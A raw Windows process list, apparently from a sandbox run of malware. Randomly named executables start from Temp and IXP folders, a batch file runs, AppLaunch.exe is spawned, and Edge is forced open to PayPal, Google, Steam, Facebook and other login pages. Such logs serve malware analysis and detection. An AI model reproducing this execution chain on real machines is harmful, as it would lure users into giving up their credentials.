"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,6071968293449853800,12518414765028567510,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,11617768223588040314,4095512355431435123,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4248 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4400 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,8621885126254123602,6905618308546528021,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,8621885126254123602,6905618308546528021,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6212 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6436 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6468 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4076 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2872 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7332 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7896 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7896 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8004 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7996 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\CE8B.exe

C:\Users\Admin\AppData\Local\Temp\CE8B.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe

C:\Users\Admin\AppData\Local\Temp\CF47.exe

C:\Users\Admin\AppData\Local\Temp\CF47.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D062.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe

C:\Users\Admin\AppData\Local\Temp\D10E.exe

C:\Users\Admin\AppData\Local\Temp\D10E.exe

C:\Users\Admin\AppData\Local\Temp\D1EA.exe

C:\Users\Admin\AppData\Local\Temp\D1EA.exe

C:\Users\Admin\AppData\Local\Temp\D353.exe

C:\Users\Admin\AppData\Local\Temp\D353.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Vd594oN.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Vd594oN.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3596 -ip 3596

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7016 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\D603.exe

C:\Users\Admin\AppData\Local\Temp\D603.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3596 -s 196

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7772 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3976 -ip 3976

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8944 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8696 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8612 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8356 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x48,0x108,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8408 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8916 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

